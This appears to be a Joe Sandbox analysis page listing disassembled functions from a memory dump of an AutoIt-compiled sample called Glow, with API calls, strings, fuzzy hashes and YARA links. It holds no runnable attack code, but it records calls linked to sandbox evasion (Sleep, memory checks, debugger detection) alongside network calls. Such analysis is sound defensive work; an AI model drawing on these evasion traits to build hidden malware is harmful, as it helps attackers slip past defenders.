Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 6424200cc7176cd86231bd9b4c37af48824a82f1366d5a060a9db231198b998d
Instruction ID: 4a317df5b3f7baf8a8a96eea3eecf1d5b6b952907084489c7d530b095cebacae
Opcode Fuzzy Hash: 6424200cc7176cd86231bd9b4c37af48824a82f1366d5a060a9db231198b998d
Instruction Fuzzy Hash: 235105725042479FCF17EF28E441ABA7BB4EF16310F66815AF8919B390DB34AD42CB91

Function 0039F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0039F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 0039F6F4

Strings

@, xrefs: 0039F6E8

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 95dfef3324604abe8982d2c348674575f69becdc6d1d52c401aeb590c1917762
Instruction ID: 1efaab679fef0cff8bec703ffef586d7823c7aa90f57390ca599a3beb9d8faef
Opcode Fuzzy Hash: 95dfef3324604abe8982d2c348674575f69becdc6d1d52c401aeb590c1917762
Instruction Fuzzy Hash: 4A5148719087489BD321AF10DC86BAFBBF8FF85300F81889DF1D9451A1EB708529CB66

Function 003FDB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 003FDB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003FDB7F

Strings

|, xrefs: 003FDB50

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: fa60b55192845b6f7eeee0a5611f7f077aa101d3289ad45bc124a82efba3f780
Instruction ID: f3f3d9cccc6f44e4b6d17cf180c2db9d2f29e4d7230434f714830c92beb445fd
Opcode Fuzzy Hash: fa60b55192845b6f7eeee0a5611f7f077aa101d3289ad45bc124a82efba3f780
Instruction Fuzzy Hash: 67316F71C01219ABCF06EFA4CC85EEEBFB9FF05304F100065F915AA166EB719A06CB50

Function 00414008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 004140BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004140F8

Strings

static, xrefs: 00414058

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 4b1fbb8257d8eec77e34d0d73c28ca0cd458d247b965b26a8b9a1ee1ad7b513f
Instruction ID: f212a8a1a16694e486f972fcfdda6f803b3bb1366ab9aca9cb1d62de3e7e041d
Opcode Fuzzy Hash: 4b1fbb8257d8eec77e34d0d73c28ca0cd458d247b965b26a8b9a1ee1ad7b513f
Instruction Fuzzy Hash: A6319071510604AADB10DF65CC80BFB77A9FF88724F10861EF9A987290DA75AC81D764

Function 00414FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 004150BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004150D2

Strings

', xrefs: 0041502C

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 810791f7d20f2f9c57d87900b6bf4861db8d808bea801627b85ce9e4fef44235
Instruction ID: 728162735f1e1af475d4bfc3d2bc2cf61366f7e0ad1ef55e8fb852e74cc9852a
Opcode Fuzzy Hash: 810791f7d20f2f9c57d87900b6bf4861db8d808bea801627b85ce9e4fef44235
Instruction Fuzzy Hash: C231F874A0170ADFDB14CFA9C980BDA7BB5FF89300F10406AE904AB392D775A985CF94

Function 003820B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

Part of subcall function 00382234: GetWindowLongW.USER32(?,000000EB), ref: 00382242

GetParent.USER32(?), ref: 003C3440
DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 003C34CA

Strings

(E, xrefs: 003820B9

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: LongWindow$ParentProc
String ID: (E
API String ID: 2181805148-3218771753
Opcode ID: 753c2b510ac983694766fc89540b8da9c881957de43f4c7b40fbb03d16d880f3
Instruction ID: ea10317d447d7b6b2bc0a63fa30f0c469e9b70f046faa7b3c4ee5982729d2cde
Opcode Fuzzy Hash: 753c2b510ac983694766fc89540b8da9c881957de43f4c7b40fbb03d16d880f3
Instruction Fuzzy Hash: F521D670601244AFCB2BAF79CC4DEA63B66EF06360F158294F6254B2F2C7318E51D710

Function 004141AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00387873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003878B1
Part of subcall function 00387873: GetStockObject.GDI32(00000011), ref: 003878C5
Part of subcall function 00387873: SendMessageW.USER32(00000000,00000030,00000000), ref: 003878CF

GetWindowRect.USER32(00000000,?), ref: 00414216
GetSysColor.USER32(00000012), ref: 00414230

Strings

static, xrefs: 004141F3

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 6f9643a394e320b7bdcb022f2ebdd913aede30898fb56c3548a56bc064c2ec0a
Instruction ID: b4b04d2e0033e0e9039338373011c4d3447c2d28b77cd5c01d9352fc949aca8d
Opcode Fuzzy Hash: 6f9643a394e320b7bdcb022f2ebdd913aede30898fb56c3548a56bc064c2ec0a
Instruction Fuzzy Hash: 0F113AB2A10209AFDB01DFA8CC45AFA7BF8EB48354F014925FD55D3250D778E891DB54

Function 003FD763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003FD7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003FD7EB

Strings

<local>, xrefs: 003FD7AB

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 6ab51aa69dbf45d723a40cd5dac4882e3a02bd45aa72d1d8d5bd6f6ff938d6bc
Instruction ID: 77c3967740b8aa7ce49d9fb83cd9c884afc584317eeeebe281a566b7ac459c10
Opcode Fuzzy Hash: 6ab51aa69dbf45d723a40cd5dac4882e3a02bd45aa72d1d8d5bd6f6ff938d6bc
Instruction Fuzzy Hash: 1911297250123AB9D7395F628C4DFF7BF5EEB127A4F104226F6198B180D3649848D2F0

Function 003E75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

CharUpperBuffW.USER32(?,?,?), ref: 003E761D
_wcslen.LIBCMT ref: 003E7629

Strings

STOP, xrefs: 003E7623, 003E7628

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 25353f97a24408b7043239271e6e348438146064c51f725465d1d4901ba157c8
Instruction ID: 5966600733a003c85dbdc26c45e34a930859a03705a0995a4fb5c1afda5163cd
Opcode Fuzzy Hash: 25353f97a24408b7043239271e6e348438146064c51f725465d1d4901ba157c8
Instruction Fuzzy Hash: D3010432A04A778BCB22AFBECC408BF73B5BB603587410A34E421961D1EB71D8008350

Function 003E262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003E2699

Strings

ComboBox, xrefs: 003E2638
ListBox, xrefs: 003E2663

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 4640180f24ef3b7f9c5972073b5aecb6aa5e2ef98661dc74dfa5143e12d49d01
Instruction ID: a87ca453c536caf5dd25060e5fcfd1775e875f91c5d79e4be9b8483dbe129661
Opcode Fuzzy Hash: 4640180f24ef3b7f9c5972073b5aecb6aa5e2ef98661dc74dfa5143e12d49d01
Instruction Fuzzy Hash: CF01B175A00275ABCB06FBA5CC51DFE77A8EF46350B10071AA872AB2D2DBB1580CC751

Function 003E2525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620

SendMessageW.USER32(?,00000180,00000000,?), ref: 003E2593

Strings

ComboBox, xrefs: 003E2532
ListBox, xrefs: 003E255D

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 8ff53136e881ef7f5904c1834c8177afd85afa022726e7bcf5d8f1c85d57a0c1
Instruction ID: 9719e158a8ba06e87f9436d8f2861f03e1dd17b8eedef4a70c329a6adda5d048
Opcode Fuzzy Hash: 8ff53136e881ef7f5904c1834c8177afd85afa022726e7bcf5d8f1c85d57a0c1
Instruction Fuzzy Hash: DD01D4B5A40255ABCB06EBA1C922EFFB3ACDF47340F14012A6802A72C1DB509A0887B1

Function 003E25A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620

SendMessageW.USER32(?,00000182,?,00000000), ref: 003E2615

Strings

ComboBox, xrefs: 003E25B6
ListBox, xrefs: 003E25E1

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 319856f9ddd988ff14c1721d67cfaf0f3dcced40a482681721748f0295d97a8e
Instruction ID: a53cf338b5a2dbca0973d6196902f72eb9c52e7300c23e4ac80ef3a8420ac2c8
Opcode Fuzzy Hash: 319856f9ddd988ff14c1721d67cfaf0f3dcced40a482681721748f0295d97a8e
Instruction Fuzzy Hash: 7801A776A4025566CB17F761C901EFF77ACDB06340F5402267842B71C2DB959E08D6B6

Function 003E26B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 003E2720

Strings

ComboBox, xrefs: 003E26C2
ListBox, xrefs: 003E26ED

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: e090d59d9bea087e908c375ba79a8b7a26c4ea80d0e89e7970ee7cefe0f54aca
Instruction ID: 507f98a73863280af0fe63945b5d18fee470e35e193d091382d7ab4838c3336b
Opcode Fuzzy Hash: e090d59d9bea087e908c375ba79a8b7a26c4ea80d0e89e7970ee7cefe0f54aca
Instruction Fuzzy Hash: D7F0F475A4036566DB06F7A48C41FFFB7ACEF06340F400A16B462A72C2DB60580CC260

Function 00419AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00419B6D

Part of subcall function 00382234: GetWindowLongW.USER32(?,000000EB), ref: 00382242

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00419B53

Strings

(E, xrefs: 00419B06

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: (E
API String ID: 982171247-3218771753
Opcode ID: af51f864a72300a8ad4c5204e3628eba2d402dd5e66911bdb1a9d7e9ebf60e57
Instruction ID: 41cdf5f2aee9c3da8450df1cac4f69419b20a83be32eb61ff8adbffb73a1663c
Opcode Fuzzy Hash: af51f864a72300a8ad4c5204e3628eba2d402dd5e66911bdb1a9d7e9ebf60e57
Instruction Fuzzy Hash: C1012430209304ABCB25AF10EC55F963B76FF81325F00056AF9020B2F1C7766C82CB58

Function 003B3A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

Strings

j3B, xrefs: 003B3A88
2<;, xrefs: 003B3A64

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID:
String ID: 2<;$j3B
API String ID: 0-24122967
Opcode ID: bfbb27d4e61f5edf51d7fb8a50f872a28149415f740ce76b184e5dcdd1e73541
Instruction ID: 23fe67065f21f2fe9859c75bdca12132a7034908aae934e96214a22d176a00c6
Opcode Fuzzy Hash: bfbb27d4e61f5edf51d7fb8a50f872a28149415f740ce76b184e5dcdd1e73541
Instruction Fuzzy Hash: A0F02438510158EADB119F90C840AF933B8DF04704F20406ABECAC7A80FB749F80D369

Function 00418432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

GetWindowLongW.USER32(?,000000F0), ref: 00418471
GetWindowLongW.USER32(?,000000EC), ref: 0041847F

Strings

(E, xrefs: 0041843E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: LongWindow
String ID: (E
API String ID: 1378638983-3218771753
Opcode ID: b57bcca8613794cc1ed75413a36ef2d352baf94d3aa3770150d06718b0da2f7c
Instruction ID: 58dcbb63b0964fd8ee4c889a3f07b3c6d4f00306c7e497f447dd1b27629a7206
Opcode Fuzzy Hash: b57bcca8613794cc1ed75413a36ef2d352baf94d3aa3770150d06718b0da2f7c
Instruction Fuzzy Hash: D3F0A9712003049FC704EF68DC00DAA77A5FB8A321B20862EF9268B3F1DB709840DB94

Function 003E1461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003E146F

Strings

AutoIt, xrefs: 003E1463
Error allocating memory., xrefs: 003E1468

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 8e0d0dd7543b27faa910e4e72c79afac6aa2f1719c045d10fcb69b88c4efb96a
Instruction ID: eef43cb055aecaf05da4940299d1d30be924d7d2228a536bbf11abcc9c07a285
Opcode Fuzzy Hash: 8e0d0dd7543b27faa910e4e72c79afac6aa2f1719c045d10fcb69b88c4efb96a
Instruction Fuzzy Hash: A5E0D87174472436D2153794AC03FC47784CF06B61F21482BF748584C29EE6649042DD

Function 003A10B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0039FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,003A10E2,?,?,?,0038100A), ref: 0039FAD9

IsDebuggerPresent.KERNEL32(?,?,?,0038100A), ref: 003A10E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0038100A), ref: 003A10F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003A10F0

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 90cbc7d4d2e72bb1a76ad20a05d8210a6f5754129c5f93e7ca649d46c0c1857e
Instruction ID: c5206b3b7334e1c24f608c9dcd6a0cc9b08e3a36244e64967cee2b1f1ded5e8a
Opcode Fuzzy Hash: 90cbc7d4d2e72bb1a76ad20a05d8210a6f5754129c5f93e7ca649d46c0c1857e
Instruction Fuzzy Hash: 1DE092B06007208FD3319F75E904342BBE4EF05301F118DADE895C6652DBB8D488CB91

Function 0039F114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0039F151

Strings

`5E, xrefs: 0039F131
h5E, xrefs: 0039F146

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Init_thread_footer
